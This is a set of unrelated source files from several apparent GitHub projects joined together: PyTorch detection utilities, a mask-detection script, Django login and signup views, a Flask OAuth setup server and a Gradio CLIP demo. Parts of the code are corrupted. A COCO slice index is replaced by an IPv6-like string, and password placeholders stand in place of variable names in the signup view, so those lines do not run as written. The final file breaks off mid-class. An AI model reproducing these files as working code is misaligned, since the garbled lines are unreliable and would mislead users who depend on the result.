# Visualize conv filter (multiple subplots)
#feature_map_vis(epoch,i)
# classification analysis
#t_SNE(output, labels, epoch, i)
# Update Visualization
if viz.check_connection():
cur_batch_window = viz.line(torch.Tensor(loss_list), torch.Tensor(batch_list),
win=cur_batch_window, name='current_batch_loss',
update=(None if cur_batch_window is None else 'replace'),
opts=cur_batch_window_opts)
loss.backward()
optimizer.step()
def test():
net.eval()
total_correct = 0
avg_loss = 0.0
for i, (images, labels) in enumerate(data_test_loader):
output = net(images)
avg_loss += criterion(output, labels).sum()
pred = output.detach().max(1)[1]
total_correct += pred.eq(labels.view_as(pred)).sum()
avg_loss /= len(data_test)
print('Test Avg. Loss: %f, Accuracy: %f' % (avg_loss.detach().cpu().item(), float(total_correct) / len(data_test)))
def train_and_test(epoch):
train(epoch)
test()
dummy_input = torch.randn(1, 1, 32, 32, requires_grad=True)
torch.onnx.export(net, dummy_input, "lenet.onnx")
onnx_model = onnx.load("lenet.onnx")
onnx.checker.check_model(onnx_model)
def main():
for e in range(1, 11):
train_and_test(e)
if __name__ == '__main__':
main()
``` |
{
"source": "JIN-strong/Mask_detection_pytorch_yolov3_fasterrcnn",
"score": 2
} |
#### File: Faster RCNN/faster_rcnn_utils/coco_utils.py
```python
import copy
import os
from PIL import Image
import torch
import torch.utils.data
import torchvision
from pycocotools import mask as coco_mask
from pycocotools.coco import COCO
import numpy as np
from . import transforms as T
class FilterAndRemapCocoCategories(object):
def __init__(self, categories, remap=True):
self.categories = categories
self.remap = remap
def __call__(self, image, target):
anno = target["annotations"]
anno = [obj for obj in anno if obj["category_id"] in self.categories]
if not self.remap:
target["annotations"] = anno
return image, target
anno = copy.deepcopy(anno)
for obj in anno:
obj["category_id"] = self.categories.index(obj["category_id"])
target["annotations"] = anno
return image, target
def convert_coco_poly_to_mask(segmentations, height, width):
masks = []
for polygons in segmentations:
rles = coco_mask.frPyObjects(polygons, height, width)
mask = coco_mask.decode(rles)
if len(mask.shape) < 3:
mask = mask[..., None]
mask = torch.as_tensor(mask, dtype=torch.uint8)
mask = mask.any(dim=2)
masks.append(mask)
if masks:
masks = torch.stack(masks, dim=0)
else:
masks = torch.zeros((0, height, width), dtype=torch.uint8)
return masks
class ConvertCocoPolysToMask(object):
def __call__(self, image, target):
w, h = image.size
image_id = target["image_id"]
image_id = torch.tensor([image_id])
anno = target["annotations"]
anno = [obj for obj in anno if obj['iscrowd'] == 0]
boxes = [obj["bbox"] for obj in anno]
# guard against no boxes via resizing
boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
boxes[:, fc00:db20:35b:7399::5].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
classes = [obj["category_id"] for obj in anno]
classes = torch.tensor(classes, dtype=torch.int64)
segmentations = [obj["segmentation"] for obj in anno]
masks = convert_coco_poly_to_mask(segmentations, h, w)
keypoints = None
if anno and "keypoints" in anno[0]:
keypoints = [obj["keypoints"] for obj in anno]
keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
classes = classes[keep]
masks = masks[keep]
if keypoints is not None:
keypoints = keypoints[keep]
target = {}
target["boxes"] = boxes
target["labels"] = classes
target["masks"] = masks
target["image_id"] = image_id
if keypoints is not None:
target["keypoints"] = keypoints
# for conversion to coco api
area = torch.tensor([obj["area"] for obj in anno])
iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
target["area"] = area
target["iscrowd"] = iscrowd
return image, target
def _coco_remove_images_without_annotations(dataset, cat_list=None):
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def _count_visible_keypoints(anno):
return sum(sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno)
min_keypoints_per_image = 10
def _has_valid_annotation(anno):
# if it's empty, there is no annotation
if len(anno) == 0:
return False
# if all boxes have close to zero area, there is no annotation
if _has_only_empty_bbox(anno):
return False
# keypoints task have a slight different critera for considering
# if an annotation is valid
if "keypoints" not in anno[0]:
return True
# for keypoint detection tasks, only consider valid images those
# containing at least min_keypoints_per_image
if _count_visible_keypoints(anno) >= min_keypoints_per_image:
return True
return False
assert isinstance(dataset, torchvision.datasets.CocoDetection)
ids = []
for ds_idx, img_id in enumerate(dataset.ids):
ann_ids = dataset.coco.getAnnIds(imgIds=img_id, iscrowd=None)
anno = dataset.coco.loadAnns(ann_ids)
if cat_list:
anno = [obj for obj in anno if obj["category_id"] in cat_list]
if _has_valid_annotation(anno):
ids.append(ds_idx)
dataset = torch.utils.data.Subset(dataset, ids)
return dataset
def convert_to_coco_api(ds):
coco_ds = COCO()
# annotation IDs need to start at 1, not 0, see torchvision issue #1530
ann_id = 1
dataset = {'images': [], 'categories': [], 'annotations': []}
categories = set()
for img_idx in range(len(ds)):
# find better way to get target
# targets = ds.get_annotations(img_idx)
img, targets = ds[img_idx]
image_id = targets["image_id"].item()
img_dict = {}
img_dict['id'] = image_id
#print(img)
#img = np.array(img)
img_dict['height'] = img.shape[-2]
img_dict['width'] = img.shape[-1]
dataset['images'].append(img_dict)
bboxes = targets["boxes"]
bboxes[:, 2:] -= bboxes[:, :2]
bboxes = bboxes.tolist()
labels = targets['labels'].tolist()
areas = targets['area'].tolist()
iscrowd = targets['iscrowd'].tolist()
if 'masks' in targets:
masks = targets['masks']
# make masks Fortran contiguous for coco_mask
masks = masks.permute(0, 2, 1).contiguous().permute(0, 2, 1)
if 'keypoints' in targets:
keypoints = targets['keypoints']
keypoints = keypoints.reshape(keypoints.shape[0], -1).tolist()
num_objs = len(bboxes)
for i in range(num_objs):
ann = {}
ann['image_id'] = image_id
ann['bbox'] = bboxes[i]
ann['category_id'] = labels[i]
categories.add(labels[i])
ann['area'] = areas[i]
ann['iscrowd'] = iscrowd[i]
ann['id'] = ann_id
if 'masks' in targets:
ann["segmentation"] = coco_mask.encode(masks[i].numpy())
if 'keypoints' in targets:
ann['keypoints'] = keypoints[i]
ann['num_keypoints'] = sum(k != 0 for k in keypoints[i][2::3])
dataset['annotations'].append(ann)
ann_id += 1
dataset['categories'] = [{'id': i} for i in sorted(categories)]
coco_ds.dataset = dataset
coco_ds.createIndex()
return coco_ds
def get_coco_api_from_dataset(dataset):
for _ in range(10):
if isinstance(dataset, torchvision.datasets.CocoDetection):
break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return dataset.coco
return convert_to_coco_api(dataset)
class CocoDetection(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms):
super(CocoDetection, self).__init__(img_folder, ann_file)
self._transforms = transforms
def __getitem__(self, idx):
img, target = super(CocoDetection, self).__getitem__(idx)
image_id = self.ids[idx]
target = dict(image_id=image_id, annotations=target)
if self._transforms is not None:
img, target = self._transforms(img, target)
return img, target
def get_coco(root, image_set, transforms, mode='instances'):
anno_file_template = "{}_{}2017.json"
PATHS = {
"train": ("train2017", os.path.join("annotations", anno_file_template.format(mode, "train"))),
"val": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val"))),
# "train": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val")))
}
t = [ConvertCocoPolysToMask()]
if transforms is not None:
t.append(transforms)
transforms = T.Compose(t)
img_folder, ann_file = PATHS[image_set]
img_folder = os.path.join(root, img_folder)
ann_file = os.path.join(root, ann_file)
dataset = CocoDetection(img_folder, ann_file, transforms=transforms)
if image_set == "train":
dataset = _coco_remove_images_without_annotations(dataset)
# dataset = torch.utils.data.Subset(dataset, [i for i in range(500)])
return dataset
def get_coco_kp(root, image_set, transforms):
return get_coco(root, image_set, transforms, mode="person_keypoints")
```
#### File: Mask_detection_pytorch_yolov3_fasterrcnn/Faster RCNN/pic.py
```python
import torch
import torchvision
from PIL import Image
import cv2
from faster_rcnn_utils.engine import evaluate
from faster_rcnn_utils.AIZOODataset import AIZOODataset
from faster_rcnn_utils.transforms import get_transform
from faster_rcnn_utils import utils
from torchvision.transforms import functional as F
import os
import time
import numpy as np
import argparse
import datetime
def py_cpu_nms(dets, thresh):
x1 = dets[:, 0].astype(int)
y1 = dets[:, 1].astype(int)
x2 = dets[:, 2].astype(int)
y2 = dets[:, 3].astype(int)
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input_file_path", type=str, default="testing/input/images", help="path to images directory")
parser.add_argument("--output_path", type=str, default="testing/output/images", help="output image directory")
parser.add_argument("--model_def", type=str, default="config/yolov3_mask.cfg", help="path to model definition file")
parser.add_argument("--weights_path", type=str, default="checkpoints/yolov3_self.pth",help="path to weights file")
parser.add_argument("--class_path", type=str, default="data/mask_dataset.names", help="path to class label file")
parser.add_argument("--conf_thres", type=float, default=0.9, help="object confidence threshold")
parser.add_argument("--nms_thres", type=float, default=0.4, help="iou thresshold for non-maximum suppression")
parser.add_argument("--img_size", type=int, default=416, help="size of each image dimension")
opt = parser.parse_args()
print(opt)
# Output directory
os.makedirs(opt.output_path, exist_ok=True)
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
print("正在使用的设备是",device)
num_classes = 3
BATCH_SIZE = 1
model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, progress=True, num_classes=num_classes, pretrained_backbone=True)
model.load_state_dict(torch.load("checkpoints_faster_rcnn/yolov3_ckpt_0__'1'.pth"))
model.to(device)
model.eval()
# ckecking for GPU for Tensor
Tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor
t_size = cv2.getTextSize(" ", cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]
for imagename in os.listdir(opt.input_file_path):
print("\n"+imagename+"_______")
image_path = os.path.join(opt.input_file_path, imagename)
org_img = cv2.imread(image_path)
i_height, i_width = org_img.shape[:2]
x = y = i_height if i_height > i_width else i_width
img = np.zeros((x, y, 3), np.uint8)
start_new_i_height = int((y - i_height) / 2)
start_new_i_width = int((x - i_width) / 2)
img[start_new_i_height: (start_new_i_height + i_height) ,start_new_i_width: (start_new_i_width + i_width) ] = org_img
img = cv2.resize(img, (opt.img_size, opt.img_size))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = np.asarray(img) / 255
img = np.transpose(img, [2, 0, 1])
img = np.expand_dims(img, axis=0)
img = torch.Tensor(img).to(device)
with torch.no_grad():
detections = model(img)
outputs = [{k: v.to(device) for k, v in t.items()} for t in detections]
id2class = {0: 'No Mask', 1: 'Mask'}
# For each detection in detections
detection = outputs[0]
mul_constant = x / opt.img_size
if detection is not None:
# for [x1, y1, x2, y2], conf, cls_pred in detection:
boxes = detection['boxes'].cpu().detach().numpy().astype(int)
labels = detection['labels'].cpu().detach().numpy()
scores = detection['scores'].cpu().detach().numpy()
all = np.c_[boxes,scores]
keep = py_cpu_nms(all, 0.1)
all = np.c_[boxes, labels,scores]
for i in keep:
if all[i][5]<0.2:
continue
x1 = int(all[i][0])
y1 = int(all[i][1])
x2 = int(all[i][2])
y2 = int(all[i][3])
if all[i][4] ==2:
labels = 1
else:
labels = 0
x1 = int(x1 * mul_constant - start_new_i_width)
y1 = int(y1 * mul_constant - start_new_i_height)
x2 = int(x2 * mul_constant - start_new_i_width)
y2 = int(y2 * mul_constant - start_new_i_height)
# Bounding box making and setting Bounding box title
if int(labels) == 0:
# WITH_MASK
cv2.rectangle(org_img, (x1, y1), (x2, y2), (0, 255, 0), 2)
else:
# WITHOUT_MASK
cv2.rectangle(org_img, (x1, y1), (x2, y2), (0, 0, 255), 2)
cv2.putText(org_img, id2class[int(labels)] + ": %.2f" % all[i][5], (x1, y1 + t_size[1]),
cv2.FONT_HERSHEY_PLAIN, 1,
[225, 255, 255], 2)
out_filepath = os.path.join(opt.output_path, imagename)
cv2.imwrite(out_filepath,org_img)
print("Done....")
cv2.destroyAllWindows()
``` |
{
"source": "jinsub1999/django_react_bootstrap",
"score": 2
} |
#### File: server/common/views.py
```python
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login as auth_login, logout as auth_logout
from django.http.response import HttpResponse, JsonResponse
from django.views.decorators.csrf import ensure_csrf_cookie
from .forms import UserForm, UserLoginForm, UserCIUploadForm
from .models import UserCustomizableInfo
# Create your views here.
@ensure_csrf_cookie
def get_csrf(req):
if req.method == "GET":
return HttpResponse()
else:
return HttpResponse("Use GET method.")
def get_user(req):
if req.method == "GET":
return HttpResponse("{0}".format(req.user))
def profile(req):
if req.method == "GET":
if not req.user.is_authenticated:
return HttpResponse("Login Required")
else:
userCI = get_object_or_404(UserCustomizableInfo, pk=req.user.id)
try:
return HttpResponse(userCI.profile_img.read(), content_type="image/*")
except:
with open("usrData/defaults/defaultimage.jpeg", "rb") as f:
return HttpResponse(f.read(), content_type="image/*")
if req.method == "POST":
if not req.user.is_authenticated:
return HttpResponse("Login Required")
else:
form = UserCIUploadForm(files=req.FILES)
if form.is_valid():
usrCI = form.save(commit=False)
usrCI.usr = req.user
usrCI.save()
return HttpResponse("OK")
return HttpResponse("Form is not vaild")
else:
return HttpResponse("Wrong method.")
def login(req):
if req.method == "POST":
form = UserLoginForm(req.POST)
if form.is_valid():
username = form.cleaned_data["username"]
password = form.cleaned_data["password"]
user = authenticate(req, username=username, password=password)
if user is not None:
auth_login(req, user)
return HttpResponse("OK")
else:
ret = {"errs": [{"errName": "usernotfoundERR",
"errDescription": "존재하지 않는 사용자이거나 비밀번호가 틀렸습니다."}]}
return JsonResponse(data=ret)
else:
ret = {"errs": []}
for (k, v) in form.errors.as_data().items():
for (idx, _v) in enumerate(v):
ret["errs"].append(
{"errName": k+"ERR", "errDescription": "{0}".format(_v)[2:-2]})
return JsonResponse(data=ret)
else:
return HttpResponse("{0}".format(req.user))
@login_required(login_url="http://localhost:3000/login")
def logout(req):
if req.method == "POST":
auth_logout(req)
return HttpResponse("LOGOUT")
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
def signup(req):
if req.method == "POST":
form = UserForm(req.POST)
if form.is_valid():
form.save(commit=False)
username = form.cleaned_data['username']
raw_password = <PASSWORD>.cleaned_data['<PASSWORD>']
if len(User.objects.filter(username=username)):
ret = {"errs": [{"errName": "usernameSIGNUPERR",
"errDescription": "{0}은(는) 이미 존재하는 아이디입니다.".format(username)}]}
return JsonResponse(data=ret)
else:
form.save()
user = authenticate(username=username, password=<PASSWORD>)
UserCustomizableInfo(usr=user).save()
auth_login(req, user)
return HttpResponse("SIGNUP")
else:
ret = {"errs": []}
for (k, v) in form.errors.as_data().items():
for (idx, _v) in enumerate(v):
ret["errs"].append(
{"errName": k+"SIGNUPERR", "errDescription": "{0}".format(_v)[2:-2]})
return JsonResponse(data=ret)
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
def getUserVote(req):
if req.method == "GET":
if not req.user.is_authenticated:
return HttpResponse("Login required")
ret = {"userUpvotes": [], "userDownvotes": []}
usr = req.user
for item in usr.product_upvotes.all():
d = item.getNonNullValDict()
d["author_name"] = item.author.username
ret["userUpvotes"].append(d)
for item in usr.product_downvotes.all():
d = item.getNonNullValDict()
d["author_name"] = item.author.username
ret["userDownvotes"].append(d)
return JsonResponse(data=ret)
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
``` |
{
"source": "jinsuki/LMDB",
"score": 4
} |
#### File: LMDB/main/media.py
```python
class Video():
def __init__(self, duration, image, storyline,
title):
self.duration = duration
self.image = image
self.storyline = storyline
self.title = title
#movie subclass
class Movie(Video):
def __init__(self, duration, image, storyline,title, link):
Video.__init__(self, duration, image, storyline, title)
self.link = link
#tvshow subclass
class TVShow(Video):
def __init__(self, duration, image, storyline,
title, episode, season):
Video.__init__(self, duration, image, storyline, title)
self.episode = episode
self.season = season
``` |
{
"source": "jinsukoh/nugu-linux",
"score": 3
} |
#### File: examples/oob_setup/nugu_oob_server.py
```python
from flask import Flask, request, redirect, session, json, url_for, make_response
from flask.json import jsonify
from flask_restful import Resource, Api
from requests_oauthlib import OAuth2Session
import os
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
PORT = 8080
# Receive from companion application
if 'NUGU_CONFIG_PATH' in os.environ:
CONFIG_PATH = os.environ['NUGU_CONFIG_PATH']
else:
CONFIG_PATH = '/var/lib/nugu'
print 'Configuration path = %s' % CONFIG_PATH
if os.path.isdir(CONFIG_PATH):
print 'path exist'
else:
print 'create directory'
os.makedirs(CONFIG_PATH)
CONFIG_PATH_AUTH = CONFIG_PATH + '/nugu-auth.json'
DEFAULT_JSON_AUTH = """{
"access_token": "",
"expires_in": "",
"refresh_token": "",
"token_type": ""
}
"""
# OAuth
CONFIG_PATH_OAUTH = CONFIG_PATH + '/nugu-oauth.json'
DEFAULT_JSON_OAUTH = """{
"pocId": "",
"clientId": "",
"clientSecret": "",
"deviceSerialNumber": ""
}
"""
authorization_base_url = 'https://api.sktnugu.com/v1/auth/oauth/authorize'
token_url = 'https://api.sktnugu.com/v1/auth/oauth/token'
redirect_uri = 'http://lvh.me:8080/callback'
app = Flask(__name__)
app.secret_key = "test"
@app.route('/auth', methods=['GET', 'PUT'])
def auth():
if request.method == 'GET':
with open(CONFIG_PATH_AUTH, 'r') as reader:
resp = make_response(reader.read())
resp.mimetype = 'application/json'
return resp
elif request.method == 'PUT':
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(request.data)
return jsonify(success=True)
@app.route('/oauth', methods=['GET', 'PUT', 'POST'])
def oauth():
if request.method == 'GET':
with open(CONFIG_PATH_OAUTH, 'r') as reader:
resp = make_response(reader.read())
resp.mimetype = 'application/json'
return resp
elif request.method == 'PUT':
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(request.data)
return jsonify(success=True)
elif request.method == 'POST':
pocId = request.form['pocId']
clientId = request.form['clientId']
clientSecret = request.form['clientSecret']
deviceSerialNumber = request.form['serial']
buf = """{{
"pocId": "{pocId}",
"clientId": "{clientId}",
"clientSecret": "{clientSecret}",
"deviceSerialNumber": "{serial}"
}}""".format(pocId=pocId, clientId=clientId, clientSecret=clientSecret, serial=deviceSerialNumber)
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(buf)
return redirect(url_for('index'))
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('index'))
@app.route('/')
def index():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
if 'pocId' in oauthinfo:
pocId = oauthinfo['pocId']
else:
pocId = ''
if 'clientId' in oauthinfo:
clientId = oauthinfo['clientId']
else:
clientId = ''
if 'clientSecret' in oauthinfo:
clientSecret = oauthinfo['clientSecret']
else:
clientSecret = ''
if 'deviceSerialNumber' in oauthinfo:
serial = oauthinfo['deviceSerialNumber']
else:
serial = ''
if 'token' in session:
token = session['token']
if 'refresh_token' in token:
refresh_token=token['refresh_token']
else:
refresh_token=''
loginForm = """
<table width=100%>
<tr>
<th>access_token</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{access_token}"/></td>
</tr>
<tr>
<th>expires_at</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{expires_at}"/></td>
</tr>
<tr>
<th>expires_in</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{expires_in}"/></td>
</tr>
<tr>
<th>refresh_token</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{refresh_token}"/></td>
</tr>
<tr>
<th>token_type</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{token_type}"/></td>
</tr>
</table>
<p align="center"><a href="/logout">Logout</a></p>
""".format(access_token=token['access_token'], expires_at=token['expires_at'], expires_in=token['expires_in'], refresh_token=refresh_token, token_type=token['token_type'])
else:
loginForm = """
<p align="center"><a href="/login">Get OAuth2 token</a></p>
"""
return """<!DOCTYPE HTML>
<html>
<head>
</head>
<body>
<fieldset>
<legend>User</legend>
{loginForm}
</fieldset>
<form method=post action='/oauth'>
<fieldset>
<legend>OAuth2 information</legend>
<table width=100%>
<tr>
<th>poc_id</th>
<td width=100%><input style="width:100%;" type=text name=pocId value="{pocId}"/></td>
</tr>
<tr>
<th>client_id</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{clientId}"/></td>
</tr>
<tr>
<th>client_secret</th>
<td width=100%><input type=text style="width:100%;" name=clientSecret value="{clientSecret}"/></td>
</tr>
<tr>
<th>device serial</th>
<td width=100%><input type=text style="width:100%;" name=serial value="{serial}"/></td>
</tr>
<tr>
<td colspan=2 align=center>
<a href="/">Reload</a> <input type=submit value="Save"/>
</td>
</tr>
</table>
</fieldset>
</form>
</body>
</html>""".format(loginForm=loginForm, pocId=pocId, clientId=clientId, clientSecret=clientSecret, serial=serial)
@app.route('/login')
def login():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
clientId = oauthinfo['clientId']
serial = oauthinfo['deviceSerialNumber']
nugu = OAuth2Session(clientId, redirect_uri=redirect_uri)
authorization_url, state = nugu.authorization_url(
authorization_base_url, data='{{"deviceSerialNumber":"{serial}"}}'.format(serial=serial))
# State is used to prevent CSRF(Cross Site Request Forgery), keep this for later.
print 'state=%s' % state
session['oauth_state'] = state
return redirect(authorization_url)
@app.route('/callback')
def callback():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
clientId = oauthinfo['clientId']
clientSecret = oauthinfo['clientSecret']
if 'oauth_state' in session:
oauth_state = session['oauth_state']
print 'state=%s' % oauth_state
else:
oauth_state = ''
print 'can not found oauth_state'
nugu = OAuth2Session(
clientId, state=oauth_state, redirect_uri=redirect_uri)
token = nugu.fetch_token(token_url, client_secret=clientSecret,
authorization_response=request.url)
print token
token_json = json.dumps(token)
print token_json
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(token_json)
session['token'] = token
return redirect(url_for('index'))
if __name__ == '__main__':
if not os.path.exists(CONFIG_PATH_AUTH):
print "Create default %s" % CONFIG_PATH_AUTH
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(DEFAULT_JSON_AUTH)
if not os.path.exists(CONFIG_PATH_OAUTH):
print "Create default %s" % CONFIG_PATH_OAUTH
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(DEFAULT_JSON_OAUTH)
print "Please connect to %d port." % PORT
app.run(host='0.0.0.0', port=PORT)
``` |
{
"source": "Jinsu-L/KELIP",
"score": 2
} |
#### File: KELIP/demo/demo_zeroshot.py
```python
import os
import sys
import json
import torch
import kelip
import gradio as gr
def load_model():
model, preprocess_img, tokenizer = kelip.build_model('ViT-B/32')
device = "cuda" if torch.cuda.is_available() else "cpu"
model = model.to(device)
model.eval()
model_dict = {'model': model,
'preprocess_img': preprocess_img,
'tokenizer': tokenizer
}
return model_dict
def classify(img, user_text):
preprocess_img = model_dict['preprocess_img']
input_img = preprocess_img(img).unsqueeze(0)
device = "cuda" if torch.cuda.is_available() else "cpu"
input_img = input_img.to(device)
# extract image features
with torch.no_grad():
image_features = model_dict['model'].encode_image(input_img)
# extract text features
user_texts = user_text.split(',')
if user_text == '' or user_text.isspace():
user_texts = []
input_texts = model_dict['tokenizer'].encode(user_texts)
if torch.cuda.is_available():
input_texts = input_texts.cuda()
text_features = model_dict['model'].encode_text(input_texts)
# l2 normalize
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T).softmax(dim=-1)
values, indices = similarity[0].topk(len(user_texts))
result = {}
for value, index in zip(values, indices):
result[user_texts[index]] = f"{value.item()*100:.2f}%"
return result
if __name__ == '__main__':
print('\tLoading models')
global model_dict
model_dict = load_model()
# define gradio demo
inputs = [gr.inputs.Image(type="pil", label="Image"),
gr.inputs.Textbox(lines=5, label="Caption"),
]
outputs = gr.outputs.KeyValues()
title = "Zeroshot classification demo"
if torch.cuda.is_available():
demo_status = "Demo is running on GPU"
else:
demo_status = "Demo is running on CPU"
description = f"Details: paper_url. {demo_status}"
examples = [
["demo/images/jkh.png", "장기하,아이유,조인성,마동석"],
["demo/images/jkh.png", "눈감았음,눈떴음"],
["demo/images/squid_sundae.jpg", "오징어 순대,김밥,순대,떡볶이"],
["demo/images/poysian.jpg", "립스틱,분필,야돔"],
["demo/images/world_peace_gate.jpg", "평화의문,올림픽공원,롯데월드,석촌호수"],
["demo/images/seokchon_lake.jpg", "평화의문,올림픽공원,롯데월드,석촌호수"],
["demo/images/hwangchil_tree.jpg", "황칠 나무 묘목,황칠 나무,난,소나무 묘목,야자수"],
["demo/images/areca_palm.jpg", "아레카야자,난초,난,식물,장미,야자수,황칠나무"],
["demo/images/world_peace_gate.jpg", "봄,여름,가을,겨울"],
["demo/images/seokchon_lake.jpg", "봄,여름,가을,겨울"],
["demo/images/spring.jpg", "봄,여름,가을,겨울"],
["demo/images/summer1.jpg", "봄,여름,가을,겨울"],
["demo/images/summer2.jpeg", "봄,여름,가을,겨울"],
["demo/images/autumn1.JPG", "봄,여름,가을,겨울"],
["demo/images/autumn2.jpg", "봄,여름,가을,겨울"],
["demo/images/winter1.jpg", "봄,여름,가을,겨울"],
["demo/images/winter2.jpg", "봄,여름,가을,겨울"],
["demo/images/airplane.png", "a photo of a airplane.,a photo of a bear.,a photo of a bird.,a photo of a giraffe.,a photo of a car."],
["demo/images/airplane.png", "비행기 사진.,곰 사진.,새 사진.,기린 사진.,자동차 사진."],
["demo/images/volleyball.png", "a photo of a person volleyball spiking.,a photo of a person jump rope.,a photo of a person soccer penalty.,a photo of a person long jump.,a photo of a person table tennis shot."],
["demo/images/volleyball.png", "배구 스파이크하는 사람의 사진.,줄넘기하는 사람의 사진.,축구 페널티하는 사람의 사진.,멀리뛰기하는 사람의 사진.,탁구 치는 사람의 사진."],
]
gr.Interface(classify,
inputs,
outputs,
title=title,
description=description,
examples=examples,
examples_per_page=50,
server_name="0.0.0.0",
server_port=10000
).launch()
``` |
{
"source": "jinsungit/hiddenfootprints",
"score": 3
} |
#### File: hiddenfootprints/hiddenfootprints/core.py
```python
import numpy as np
import tensorflow as tf
from .utils import get_global_box, box_label_to_corners, global_box_to_camera_image_matmul, convert_camera_gc
def read_single_frame(frame_record, open_dataset, selected_camera='FRONT'):
"""Return a dictionary for the given frame.
frame['im']: image.
frame['extrinsic']: selected camera extrinsic matrix.
frame['intrinsic']: selected camera intrinsic matrix.
frame['boxes_coords']: global coordinates of 8 corners of 3d labeled boxes, size Nx8x3
frame['boxes_id']: semantic id of 3d labeled boxes. See Waymo documentation for classes.
"""
frame = {}
#################
# images
for index, image in enumerate(frame_record.images):
if open_dataset.CameraName.Name.Name(image.name) == selected_camera:
im = tf.image.decode_jpeg(image.image).numpy()
frame['im'] = im
#################
# camera extrinsic (global frame to camera frame) and intrinsic
for camera in frame_record.context.camera_calibrations:
if open_dataset.CameraName.Name.Name(camera.name) == selected_camera:
extrinsic_mat = np.array(camera.extrinsic.transform).reshape(4,4)# this is camera to vehicle
extrinsic = convert_camera_gc(extrinsic_mat, np.array(frame_record.pose.transform).reshape(4,4)) # 4x4
intrinsic = camera.intrinsic # 9
frame['extrinsic'] = extrinsic
frame['intrinsic'] = intrinsic
#################
# 3D boxes in global frame
frame['boxes_coords'] = []
frame['boxes_id'] = []
for chosen_obj in frame_record.laser_labels:
# convert box to 3d cube corners in global frame
obj_corners_3d_global_standard = get_global_box(frame_record, chosen_obj) # 3x8
frame['boxes_coords'].append(obj_corners_3d_global_standard.transpose())
frame['boxes_id'].append(chosen_obj.type)
frame['boxes_coords'] = np.array(frame['boxes_coords'])
return frame
def propagate(reference_frame_idx, frames):
"""Return all boxes in the segment propagated into the reference frame, shape Nx3
reference_frame_propagated_labels: [id,x,y]
"""
reference_frame_camera_extrinsic = frames[reference_frame_idx]['extrinsic']
reference_frame_camera_intrinsic = frames[reference_frame_idx]['intrinsic']
reference_frame_propagated_labels = []
for source_frame_idx in range(len(frames)): # loop through all frames
for box_idx in range(len(frames[source_frame_idx]['boxes_id'])): # for each object in current frame
semantic_id = frames[source_frame_idx]['boxes_id'][box_idx]
chosen_box_coords = frames[source_frame_idx]['boxes_coords'][box_idx,:].reshape((8,3))
# project to camera frame of 8 corners
box_coords_projected_8_corners = global_box_to_camera_image_matmul(chosen_box_coords,
reference_frame_camera_extrinsic,
reference_frame_camera_intrinsic)
if box_coords_projected_8_corners.shape[0]>4: # valid projected bottom face of 3D boxes
footprint_x, footprint_y = box_coords_projected_8_corners[4:,:].mean(axis=0)
reference_frame_propagated_labels.append([semantic_id, footprint_x, footprint_y])
return np.array(reference_frame_propagated_labels)
```
#### File: hiddenfootprints/model/resnet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import importlib
import numpy as np
def class_for_name(module_name, class_name):
# load the module, will raise ImportError if module cannot be loaded
m = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
return getattr(m, class_name)
class conv(nn.Module):
